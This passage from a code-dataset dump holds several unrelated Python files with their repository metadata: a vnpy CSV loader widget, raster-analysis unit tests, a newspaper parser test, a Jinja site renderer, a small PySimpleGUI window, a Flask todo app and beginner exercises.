bot.run()\n","repo_name":"Stepbus/demo_teleBot_bscscan_project","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"17144304738","text":"\"\"\"\nAuthor: Zehua Wei (nanoric)\n\"\"\"\n\nfrom vnpy.event import EventEngine\nfrom vnpy.trader.constant import Exchange, Interval\nfrom vnpy.trader.engine import MainEngine\nfrom vnpy.trader.ui import QtCore, QtWidgets\n\nfrom ..engine import APP_NAME\n\n\nclass CsvLoaderWidget(QtWidgets.QWidget):\n \"\"\"\"\"\"\n\n def __init__(self, main_engine: MainEngine, event_engine: EventEngine):\n \"\"\"\"\"\"\n super().__init__()\n\n self.engine = main_engine.get_engine(APP_NAME)\n\n self.init_ui()\n\n def init_ui(self):\n \"\"\"\"\"\"\n self.setWindowTitle(\"CSV载入\")\n self.setFixedWidth(300)\n\n self.setWindowFlags(\n (self.windowFlags() | QtCore.Qt.CustomizeWindowHint)\n & ~QtCore.Qt.WindowMaximizeButtonHint)\n\n file_button = QtWidgets.QPushButton(\"选择文件\")\n file_button.clicked.connect(self.select_file)\n\n load_button = QtWidgets.QPushButton(\"载入数据\")\n load_button.clicked.connect(self.load_data)\n\n self.file_edit = QtWidgets.QLineEdit()\n self.symbol_edit = QtWidgets.QLineEdit()\n\n self.exchange_combo = QtWidgets.QComboBox()\n for i in Exchange:\n self.exchange_combo.addItem(str(i.name), i)\n\n self.interval_combo = QtWidgets.QComboBox()\n for i in Interval:\n self.interval_combo.addItem(str(i.name), i)\n\n self.datetime_edit = QtWidgets.QLineEdit(\"Datetime\")\n self.open_edit = QtWidgets.QLineEdit(\"Open\")\n self.high_edit = QtWidgets.QLineEdit(\"High\")\n self.low_edit = QtWidgets.QLineEdit(\"Low\")\n self.close_edit = QtWidgets.QLineEdit(\"Close\")\n self.volume_edit = QtWidgets.QLineEdit(\"Volume\")\n\n self.format_edit = QtWidgets.QLineEdit(\"%Y-%m-%d %H:%M:%S\")\n\n info_label = QtWidgets.QLabel(\"合约信息\")\n info_label.setAlignment(QtCore.Qt.AlignCenter)\n\n head_label = QtWidgets.QLabel(\"表头信息\")\n head_label.setAlignment(QtCore.Qt.AlignCenter)\n\n format_label = QtWidgets.QLabel(\"格式信息\")\n format_label.setAlignment(QtCore.Qt.AlignCenter)\n\n form = QtWidgets.QFormLayout()\n form.addRow(file_button, self.file_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(info_label)\n form.addRow(\"代码\", self.symbol_edit)\n form.addRow(\"交易所\", self.exchange_combo)\n form.addRow(\"周期\", self.interval_combo)\n form.addRow(QtWidgets.QLabel())\n form.addRow(head_label)\n form.addRow(\"时间戳\", self.datetime_edit)\n form.addRow(\"开盘价\", self.open_edit)\n form.addRow(\"最高价\", self.high_edit)\n form.addRow(\"最低价\", self.low_edit)\n form.addRow(\"收盘价\", self.close_edit)\n form.addRow(\"成交量\", self.volume_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(format_label)\n form.addRow(\"时间格式\", self.format_edit)\n form.addRow(QtWidgets.QLabel())\n form.addRow(load_button)\n\n self.setLayout(form)\n\n def select_file(self):\n \"\"\"\"\"\"\n result: str = QtWidgets.QFileDialog.getOpenFileName(self)\n filename = result[0]\n if filename:\n self.file_edit.setText(filename)\n\n def load_data(self):\n \"\"\"\"\"\"\n file_path = self.file_edit.text()\n symbol = self.symbol_edit.text()\n exchange = self.exchange_combo.currentData()\n interval = self.interval_combo.currentData()\n datetime_head = self.datetime_edit.text()\n open_head = self.open_edit.text()\n low_head = self.low_edit.text()\n high_head = self.high_edit.text()\n close_head = self.close_edit.text()\n volume_head = self.volume_edit.text()\n datetime_format = self.format_edit.text()\n\n start, end, count = self.engine.load(\n file_path,\n symbol,\n exchange,\n interval,\n datetime_head,\n open_head,\n high_head,\n low_head,\n close_head,\n volume_head,\n datetime_format\n )\n\n msg = f\"\\\n CSV载入成功\\n\\\n 代码:{symbol}\\n\\\n 交易所:{exchange.value}\\n\\\n 周期:{interval.value}\\n\\\n 起始:{start}\\n\\\n 结束:{end}\\n\\\n 总数量:{count}\\n\\\n \"\n QtWidgets.QMessageBox.information(self, \"载入成功!\", msg)\n","repo_name":"GladosAI/VN-CTP","sub_path":"vnpy/app/csv_loader/ui/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":4385,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"5"} +{"seq_id":"1857376367","text":"from google.appengine.ext import db\n\n\nclass ModelMixin(object):\n \"\"\"\n Base class used to create mix-in classes for L{db.Model} classes.\n \"\"\"\n\n __metaclass__ = db.PropertiedClass\n\n @classmethod\n def kind(self):\n \"\"\"\n Need to implement this because it is called by PropertiedClass\n to register the kind name in _kind_map. We just return a dummy name.\n \"\"\"\n return '__model_mixin__'\n\n\nclass Timestamped(ModelMixin):\n create_date = db.DateTimeProperty(auto_now_add=True, indexed=True)\n modified_date = db.DateTimeProperty(auto_now=True, indexed=False)\n","repo_name":"computmaxer/boxtrackr","sub_path":"base/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"37077503233","text":"\"\"\"\n\n Sandbar Analysis Unit Testing\n\n How to use in pyCharm:\n 1. preferncecs => Tools => Python Integrated Tools => Default Test Runner => Unittest\n 2. Create a new run configuration using the run configuration dropdown in the top\n left. use the \"+\" button to choose Python Tests => Unittest\n Just se the default options\n 3. Now you can run Unittests in sandbar-analysis\n\n\"\"\"\n\n# Utility functions we need\nimport unittest\nimport numpy as np\nimport gdal, shutil\nfrom os import path, makedirs\n\n# Here's what we're testing\nimport RasterAnalysis\nfrom logger import Logger\nfrom Raster import Raster, deleteRaster\nfrom CSVLib import unionCSVExtents\nfrom SandbarSite import SandbarSite\n\nclass TempPathHelper():\n def __init__(self):\n \"\"\"\n Create for us a tmp Path\n :return: the path to the tmp folder\n \"\"\"\n cwd = path.dirname(path.abspath(__file__))\n self.path = path.join(cwd, 'TMP')\n if path.isdir(self.path):\n self.destroy()\n makedirs(self.path)\n\n def destroy(self):\n \"\"\"\n Clean up our tmp folder\n :return:\n \"\"\"\n if self.path is not None and path.isdir(self.path):\n shutil.rmtree(self.path)\n\nclass TestLoggerSingletonClass(unittest.TestCase):\n\n def test_singleton(self):\n \"\"\"\n Test the singleton. If it's not the same object nothing else matters\n \"\"\"\n log1 = Logger(\"testMessages\")\n log2 = Logger(\"Other things\")\n self.assertIs(log1.instance.instance, log2.instance.instance)\n\n def test_messages(self):\n \"\"\"\n Test all the basic message types\n \"\"\"\n log = Logger('TestMessages')\n log.setup(logRoot='test',\n xmlFilePath='TestMessages.xml',\n verbose=False,\n config={})\n log.info(\"Info Message\")\n log.warning(\"Warning Message\")\n log.error(\"Error Message\")\n log.error(\"Error Message with exception\", Exception(\"thing is an exception\"))\n log.destroy()\n self.assertTrue(True)\n\n def test_MultipleLoggers(self):\n log1 = Logger(\"Method1\")\n log2 = Logger(\"Method2\")\n log1.setup(logRoot='test',\n xmlFilePath='TestMultipleLoggers.xml',\n verbose=False,\n config={})\n\n log1.info('TestMessages from log1')\n log2.info('TestMessages from log2')\n\n log1.destroy()\n log2.destroy()\n self.assertTrue(True)\n\n def test_DebugFlag(self):\n log = Logger('TestMessages With Verbose')\n log.setup(logRoot='test',\n xmlFilePath='TestDebugFlagFalse.xml',\n verbose=False,\n config={})\n log.info(\"This message should appear on its own\")\n log.debug(\"This message should not appear\")\n\n log.setup(logRoot='test',\n xmlFilePath='TestDebugFlagTrue.xml',\n verbose=True,\n config={})\n log.info(\"This message should appear and one below it\")\n log.debug(\"This message should also appear\")\n log.destroy()\n self.assertTrue(True)\n\n def test_DebugMultiObj(self):\n log = Logger('TestDebugMultiObj')\n log.setup(logRoot='test',\n xmlFilePath='TestDebugMultiObj.xml',\n verbose=True,\n config={})\n log.debug(\"Some things:\", {\"thing1\": \"thing1Val\"}, [0,1,2,3,4,5], 2232.343)\n log.destroy()\n self.assertTrue(True)\n\nclass TestRasterClass(unittest.TestCase):\n \"\"\"\n Before we do anything we need to test that the mechanism\n we use to verify tests is ok.\n \"\"\"\n def test_Write(self):\n tmp = TempPathHelper()\n filename1 = path.join(tmp.path, 'raster1.tif')\n filename2 = path.join(tmp.path, 'raster1-neg-cell-height.tif')\n ndVal = -9999.0\n dataType = gdal.GDT_Float32\n extent = (0,0.4,0,0.3)\n proj = \"\"\n # Input Array. here we test lots of different kinds of values\n inRas = np.ma.masked_array( [\n [ 0.0, 1, 2, 3 ],\n [ ndVal, np.nan, np.nan, 3 ],\n [ 100, 200.0, 300, 500000.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [0,0,0,0],\n [0,0,0,0]] ) )\n\n # And here's what we expect to get back when we read the file back in:\n # NB: Note different mask and values\n raOut = np.ma.masked_array( [\n [ 0.0, 1.0, ndVal, 3.0 ],\n [ ndVal, ndVal, ndVal, 3.0 ],\n [ 100, 200.0, 300.0, 500000.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [1,1,1,0],\n [0,0,0,0]\n ]) )\n\n rIn = Raster(array=inRas, extent=extent, cellWidth=0.1, cellHeight=0.1, nodata=ndVal, proj=proj)\n rIn.write(filename1)\n\n # Now load it into another raster object and compare the two\n rOut = Raster(filepath=filename1)\n # rOut.PrintRawArray()\n # rOut.PrintArray()\n # rOut.ASCIIPrint()\n # The input array equals the output array\n self.assertTrue((rIn.array == rOut.array).all())\n # The output array is what we expect\n self.assertTrue((rIn.array == raOut).all())\n self.assertTrue(rOut.nodata == ndVal)\n self.assertTrue(rOut.proj == proj)\n self.assertTrue(rOut.top == extent[2])\n self.assertTrue(rOut.left == extent[0])\n self.assertTrue(rOut.dataType == dataType)\n\n # Try again, this time with negative cell height\n rIn2 = Raster(array=np.flipud(inRas), extent=extent, cellWidth=0.1, cellHeight=-0.1, nodata=ndVal, proj=proj)\n rIn2.write(filename2)\n\n # Now load it into another raster object and compare the two\n rOut2 = Raster(filepath=filename2)\n # rOut2.PrintRawArray()\n # rOut2.PrintArray()\n # rOut2.ASCIIPrint()\n self.assertTrue(rOut2.nodata == ndVal)\n self.assertTrue(rOut2.proj == proj)\n self.assertTrue(rOut2.top == extent[3]) # Top is now different\n self.assertTrue(rOut2.left == extent[0])\n self.assertTrue(rOut2.dataType == dataType)\n\n # The input array equals the output array\n self.assertTrue((rIn2.array == rOut2.array).all())\n # The output array is what we expect\n self.assertTrue((rIn2.array == np.flipud(raOut)).all())\n\n\n # Clean up any files created\n deleteRaster(filename1)\n deleteRaster(filename2)\n tmp.destroy()\n\n def test_SetArray(self):\n cellSize = 1\n theExtent = (0, 3, 10, 12)\n maskedArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n\n unmaskedArray = np.array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]])\n\n rTestMasked1 = Raster(extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n rTestMasked1.setArray(maskedArray)\n rTestMasked2 = Raster(array=maskedArray, extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n\n rTestNoMask1 = Raster(extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n rTestNoMask1.setArray(maskedArray)\n rTestNoMask2 = Raster(array=maskedArray, extent=theExtent, cellWidth=cellSize, rows=3, cols=4)\n\n print((rTestMasked1.array))\n print((rTestMasked2.array))\n print((rTestNoMask1.array))\n print((rTestNoMask2.array))\n\n # Compare direct Array setting to setting it later for MASKED input array\n self.assertTrue((rTestMasked1.array == rTestMasked2.array).all())\n self.assertTrue((rTestMasked1.array.mask == rTestMasked2.array.mask).all())\n\n # Compare direct Array setting to setting it later for UNMASKED input array\n self.assertTrue((rTestNoMask1.array == rTestNoMask2.array).all())\n self.assertTrue((rTestNoMask1.array.mask == rTestNoMask2.array.mask).all())\n\n # Compare masked to unmasked\n self.assertTrue((rTestMasked1.array == rTestNoMask1.array).all())\n self.assertTrue((rTestMasked1.array.mask == rTestNoMask1.array.mask).all())\n\n # Compare masked to unmasked\n self.assertTrue((rTestMasked2.array == rTestNoMask2.array).all())\n self.assertTrue((rTestMasked2.array.mask == rTestNoMask2.array.mask).all())\n\n def test_loadDEMFromCSV(self):\n tmp = TempPathHelper()\n filename = path.join(tmp.path, 'raster1.tif')\n cellSize = 1.0\n padding = 0\n gridPath = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid1.txt')\n theExtent = unionCSVExtents([gridPath], padding=padding, cellSize=cellSize)\n rTest = Raster(extent=theExtent, cellWidth=cellSize)\n\n # Here's what we're testing:\n rTest.loadDEMFromCSV(gridPath, theExtent, Raster.PointShift.CENTER)\n\n testArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n\n # If the extent is wrong then this test is invalid\n self.assertTupleEqual(theExtent, (-0.5, 3.5, 9.5, 12.5))\n self.assertEqual(theExtent[0], rTest.left)\n self.assertEqual(theExtent[3], rTest.top)\n\n # Now the real test begins\n self.assertEqual(rTest.cellHeight, -cellSize)\n self.assertEqual(rTest.cellWidth, cellSize)\n self.assertEqual(rTest.rows, 3)\n self.assertEqual(rTest.cols, 4)\n self.assertEqual(rTest.left, -0.5)\n self.assertEqual(rTest.top, 12.5)\n self.assertEqual(rTest.array.shape, (3, 4))\n self.assertTrue((rTest.array == testArray).all())\n rTest.write(filename)\n deleteRaster(filename)\n tmp.destroy()\n\n\n def test_MergeMinSurface(self):\n cellSize = 1\n gridPath1 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid1.txt')\n gridPath2 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'grid2.txt')\n\n theExtent = unionCSVExtents([gridPath1,gridPath2], padding=0)\n # Create our two grids from CSV files that we can add into the min surface\n rTest1 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest1.loadDEMFromCSV(gridPath1, theExtent, ptCenter=Raster.PointShift.CENTER)\n rTest2 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest2.loadDEMFromCSV(gridPath2, theExtent, ptCenter=Raster.PointShift.CENTER)\n\n # Now let's create a min surface we can use to test things\n rMinSrf = Raster(extent=theExtent, cellWidth=cellSize)\n rMinSrf.setArray(np.nan * np.empty((rTest1.rows, rTest1.cols)))\n\n rMinSrf.MergeMinSurface(rTest1)\n testArray = np.ma.masked_array([\n [924.846, 926.17, 901.45, 942.184],\n [904.828, 912.693, np.nan, np.nan],\n [937.801, 928.423, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 1, 1],\n [0, 0, 0, 0]]))\n self.assertTrue((rMinSrf.array == testArray).all())\n\n rMinSrf.MergeMinSurface(rTest2)\n testArray2 = np.ma.masked_array([\n [911.511, 922.517, 901.45, 923.232],\n [904.828, 911.819, 907.663, 931.264],\n [919.413, 920.007, 941.453, 912.141]],\n mask=np.array([\n [0, 0, 0, 0],\n [0, 0, 0, 0],\n [0, 0, 0, 0]]))\n self.assertTrue((rMinSrf.array == testArray2).all())\n\n\n def test_ResampleDEM(self):\n cellSize = 1\n ndVal = -9999.0\n theExtent = (0, 3, 10, 12)\n theTestArray = np.ma.masked_array([\n [0.0, 1, 2, 3],\n [ndVal, np.nan, 6, 3],\n [100, 200.0, 300, 500000.0]],\n mask=np.array([\n [0, 0, 1, 0],\n [1, 1, 0, 0],\n [0, 0, 0, 0]]))\n\n rTest1 = Raster(array=theTestArray, extent=theExtent, cellWidth=cellSize)\n rTest1.PrintArray()\n rTest1.ASCIIPrint()\n rLinear = rTest1.ResampleDEM(0.5, 'linear')\n rLinear.PrintArray()\n rLinear.ASCIIPrint()\n\n rBilinear = rTest1.ResampleDEM(0.5, 'bilinear')\n rBilinear.PrintArray()\n\n rCubic = rTest1.ResampleDEM(0.5, 'cubic')\n rCubic.PrintArray()\n rCubic.ASCIIPrint()\n\n rNearest = rTest1.ResampleDEM(0.5, 'nearest')\n rNearest.PrintArray()\n rNearest.ASCIIPrint()\n\n # We have no test for this so it should always fail\n self.assertTrue(False)\n\n def test_ResampleCSVDEM(self):\n tmp = TempPathHelper()\n padding = 5\n\n cellSize = 1\n gridPath1 = path.join(path.dirname(path.abspath(__file__)), 'test', 'assets', 'grids', 'realgrid.txt')\n theExtent = unionCSVExtents([gridPath1], padding=padding)\n # Create our grid from CSV file that we can add into the min surface\n rTest1 = Raster(extent=theExtent, cellWidth=cellSize)\n rTest1.loadDEMFromCSV(gridPath1, theExtent, ptCenter=Raster.PointShift.CENTER)\n rTest1filename = path.join(tmp.path, 'realgrid.tif')\n rTest1.write(rTest1filename)\n\n rLinear = rTest1.ResampleDEM(0.5, 'linear')\n rLinearFilename = path.join(tmp.path, 'realgridLinear.tif')\n rLinear.write(rLinearFilename)\n\n rBilinear = rTest1.ResampleDEM(0.5, 'bilinear')\n rBilinearFilename = path.join(tmp.path, 'realgridBilinear.tif')\n rBilinear.write(rBilinearFilename)\n\n rCubic = rTest1.ResampleDEM(0.5, 'cubic')\n rCubicfilename = path.join(tmp.path, 'realgridCubic.tif')\n rCubic.write(rCubicfilename)\n\n rNearest = rTest1.ResampleDEM(0.5, 'nearest')\n rNearestFilename = path.join(tmp.path, 'realgridNearest.tif')\n rNearest.write(rNearestFilename)\n\n deleteRaster(rTest1filename)\n deleteRaster(rLinearFilename)\n deleteRaster(rBilinearFilename)\n deleteRaster(rCubicfilename)\n deleteRaster(rNearestFilename)\n tmp.destroy()\n\n # We have no test for this so it should always fail\n self.assertTrue(False)\n\nclass TestSandbarSite(unittest.TestCase):\n \"\"\"\n Testing raster creation from CSV\n All these methods have been done by hand first. Compare to this:\n https://docs.google.com/spreadsheets/d/1fimx0WABf2cm7fhs_EUithfgGOwky5tTX2_IRf9M1aI/edit#gid=0\n \"\"\"\n def test_getRasterTXTUnionExtent(self):\n padding = 10\n cellsize = 1.0\n tmp = TempPathHelper()\n currdir = path.dirname(path.abspath(__file__))\n gridPath1 = path.join(currdir, 'test', 'assets', 'grids', 'grid1.txt')\n gridPath2 = path.join(currdir, 'test', 'assets', 'grids', 'grid2.txt')\n gridPath3 = path.join(currdir, 'test', 'assets', 'grids', 'grid3.txt')\n\n theExtent = unionCSVExtents([gridPath1, gridPath2, gridPath3], padding=10)\n self.assertTupleEqual(theExtent, (-10.5, 14.5, -0.5, 23.5))\n\nclass TestAreaVolume(unittest.TestCase):\n \"\"\"\n Refer to this spreadsheet: https://docs.google.com/spreadsheets/d/1MmjVkg4lg50rC0n6xYBTeor0T3_QPLQRaEYFmBnB5OA/edit#gid=0\n\n NOTE: THE FOLLOWING ASSUMES THRESHOLDING ASSUMES BOTH \">\" AND \"<\" (AS OPPOSED TO \"<=\" AND/OR \">=\")\n \"\"\"\n def setUp(self):\n # Input Array. here we test lots of different kinds of values\n self.ndVal = -9999.0\n self.cellSize = 0.1\n\n self.arSurf = np.ma.masked_array( [\n [ 10.0, 12, self.ndVal, 13 ],\n [ np.nan, 18, 24.0, 3 ],\n [ 100, 3.0, 30.0, 20.0 ] ],\n mask = np.array([\n [0,0,1,0],\n [1,0,0,0],\n [0,0,0,0]] ) )\n\n # Set the minimum surface up with some values\n self.arMin = np.ma.masked_array([\n [10, 0.5, 0.1, 0.002],\n [self.ndVal, 15, 0.1, 0.003],\n [0.0, 0.5, 20, 0.004]],\n mask=np.array([\n [0, 0, 1, 0],\n [1, 0, 0, 0],\n [0, 1, 0, 0]]))\n\n def test_LowZeroNoHigh(self):\n \"\"\"\n Test when low threshold is 0 and there is no high threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 0, None , self.cellSize, \"\")\n self.assertAlmostEqual(test[0],0.08, places=7)\n self.assertAlmostEqual(test[1],1.8439, places=7)\n\n def test_LowNoHigh(self):\n \"\"\"\n Test when low threshold is 1 and there is no high threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 10, None , self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.07, places=7)\n self.assertAlmostEqual(test[1], 1.32, places=7)\n\n def test_HighNoLow(self):\n \"\"\"\n Test when there is a high threshold but no low threshold\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, None, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.04, places=7)\n self.assertAlmostEqual(test[1], 0.305, places=7)\n\n def test_LowAndHigh(self):\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 10, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0],0.03, places=7)\n self.assertAlmostEqual(test[1], 0.08, places=7)\n\n def test_MinEqualSurface(self):\n \"\"\"\n Test when the minimum surface is equal to the surface being tested\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 0, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 10, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.02, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, None, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arMin, self.arMin, 10, 20, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.01, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n\n def test_HighThresholds(self):\n \"\"\"\n Test when the thresholds are all super high (above the surface and the minimum)\n \"\"\"\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 101, None, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.0, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, None, 200, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.08, places=7)\n self.assertAlmostEqual(test[1], 1.8439, places=7)\n\n test = RasterAnalysis.getVolumeAndArea(self.arSurf, self.arMin, 101, 200, self.cellSize, \"\")\n self.assertAlmostEqual(test[0], 0.0, places=7)\n self.assertAlmostEqual(test[1], 0.0, places=7)\n\nif __name__ == '__main__':\n unittest.main()\n\n\n\n\n","repo_name":"Ryan-Lima/Sandbar_workbench_python_3","sub_path":"Python3-version/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":19599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"4603201751","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom unittest import TestCase\nfrom HtmlAndTextParseHelper import get_gazete_name, get_unicode\nfrom ZamanReader import ZamanReader\n\n__author__ = 'cvardar'\n\n\nclass test_zaman_parse(TestCase):\n def test_read_yazarlar_zaman(self):\n f = open('ZamanYazarlar.html', 'r')\n f_read = f.read()\n reader = ZamanReader()\n links = reader.get_yazi_links(f_read)\n f = open('ZamanExpectedLinks.txt', 'r')\n expected_links = set([x.strip() for x in f.readlines()])\n self.assertEqual(expected_links, links)\n\n def test_read_yazarlar_zaman(self):\n f = open('ZamanYazarlar2.html', 'r')\n f_read = f.read()\n reader = ZamanReader()\n links = reader.get_yazi_links(f_read)\n self.assertEqual(38, len(links))\n\n def test_read_yazi_zaman(self):\n f = open('ZamanYazi.html', 'r')\n f_read = f.read()\n url = 'http://zaman.com.tr/ahmet-kurucan/bu-kadar-basit-degil-olamaz-olmamali_2119892.html'\n reader = ZamanReader()\n\n yazi = reader.get_doc_from_html(f_read, url)\n self.assertEqual(get_unicode('Cehalet kıskacında teokrasi ve demokrasi'), yazi['title'])\n self.assertEqual(get_unicode(' 15 Ağustos 2013, Perşembe'), yazi['date'])\n self.assertEqual(get_unicode('Ahmet Kurucan'), yazi['author'])\n self.assertEqual(get_unicode('Zaman'), yazi['gazete'])\n self.assertEqual(3946, len(yazi['content']))\n\n def test_gazete_name(self):\n gazete_name = get_gazete_name(\"http://zaman.com.tr/yazarlar\")\n self.assertEqual('zaman', gazete_name)\n","repo_name":"cemvardar/bottle_heroku_hello","sub_path":"tests/test_zaman_parse.py","file_name":"test_zaman_parse.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7331119986","text":"import argparse\nimport json\nimport os\nfrom functools import partial\nfrom pathlib import Path\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\nfrom livereload import Server\nfrom more_itertools import chunked\n\n\ndef gets_args():\n parser = argparse.ArgumentParser('accepts optional args')\n parser.add_argument(\n '-jp', '--json_path',\n help='in enter your path to the file',\n default=os.path.join(Path.cwd(), 'book_page.json')\n )\n args = parser.parse_args()\n return args\n\n\ndef on_reload(json_path, num_described_books_per_page):\n number_of_columns = 2\n Path('pages').mkdir(parents=True, exist_ok=True)\n with open(json_path, 'r') as file:\n book_descriptions = list(\n chunked(json.load(file), num_described_books_per_page)\n )\n total_pages_num = len(book_descriptions)\n for num, books_description_page in enumerate(book_descriptions, 1):\n description_books_page = chunked(\n books_description_page, number_of_columns\n )\n env = Environment(\n loader=FileSystemLoader('.'),\n autoescape=select_autoescape(['html'])\n )\n template = env.get_template(os.path.join('templates', 'template.html'))\n rendered_page = template.render(\n description_books_page=description_books_page,\n total_pages_num=total_pages_num,\n current_page_number=num,\n )\n with open(\n os.path.join(\n 'pages',\n f'index{num}.html'\n ), 'w', encoding='utf8'\n ) as file:\n file.write(rendered_page)\n\n\ndef main():\n num_described_books_per_page = 10\n json_path = gets_args().json_path\n on_reload(json_path, num_described_books_per_page)\n server = Server()\n server.watch(\n os.path.join('templates', 'template.html'),\n partial(\n on_reload,\n json_path,\n num_described_books_per_page\n )\n )\n server.serve(root='.')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"serega19851/parsing","sub_path":"render_website.py","file_name":"render_website.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24305557990","text":"import PySimpleGUI as sg \n\n#definicion de tema\nsg.theme('black') \n\n \nlayout = [[sg.Text('Inicializar app?...')], \n [sg.Button('START'), sg.Button('CANCEL')] ] \n \nwindow = sg.Window('safe-eye', layout,no_titlebar=True,grab_anywhere=True)\n \nwhile True: \n event, values = window.read() \n if event in (None, 'CANCEL'): \n break \n \n if event == 'START':\n print('inicializado....')\n \nwindow.close()","repo_name":"Echxvx2610/Keylogger","sub_path":"App/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6505532090","text":"import cs50\n\nwhile True:\n print (\"Height: \", end=\"\")\n height = cs50.get_int()\n if height>=0 and height<23:\n break\n\nlength=2*height-1\n\nprint (\"icreadible pyramide\")\n\nfor i in range (height):\n spaces=length-2*i-1\n s=int(spaces/2)\n hashes=length-spaces\n print(\" \" * s, end=\"\")\n print(\"#\" * hashes, end=\"\")\n print(\" \" * s, end=\"\")\n print()","repo_name":"OlhaLop/Python-exercises","sub_path":"pyramide.py","file_name":"pyramide.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"6972058876","text":"from flask import Flask, render_template, request\nfrom datetime import datetime\nfrom pprint import pprint\n\nfrom werkzeug.wrappers import response\n\napp = Flask(__name__)\n\n# The in-memory database, because I'm stuck on a plane and can't install sqllite\ndatabase = [\n {\n \"id\": 0,\n \"text\": \"Todo number 1\",\n \"date\": datetime.now()\n }\n]\n\ndef add_todo(todo):\n database.append({\n \"id\": len(database),\n \"text\": todo,\n \"date\": datetime.now()\n })\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n if (request.method == \"POST\"):\n task_content = request.form['content']\n add_todo(task_content)\n print(\"\\n\\ndatabase:\")\n pprint(database)\n else:\n pass\n\n return render_template(\"index.html\")\n\n\n@app.route('/delete/', methods=[\"DELETE\"])\ndef delete(id):\n print('hit the delete route')\n pprint(request)\n return \"hit the delete route\"\n\n\n\n@app.route('/update')\ndef update():\n print('hit the update route')\n return \"hit the update route\"\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"slutske22/Practice_files","sub_path":"python_flask_tut/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14977095474","text":"import tensorflow as tf\nfrom random import shuffle\nimport glob\nimport pandas\nimport numpy as np\n\n\ndef data_bin(train_path):\n csv = pandas.read_csv(train_path).values\n feature_bin = []\n label_bin = []\n for row in csv:\n feature_bin.append(row[1:])\n zeros_bin = np.zeros(10)\n zeros_bin[row[0]] = 1\n label_bin.append(zeros_bin)\n\n label_bin = np.array(label_bin)\n feature_bin = np.array(feature_bin)\n\n return label_bin, feature_bin\n\n\n# X is a 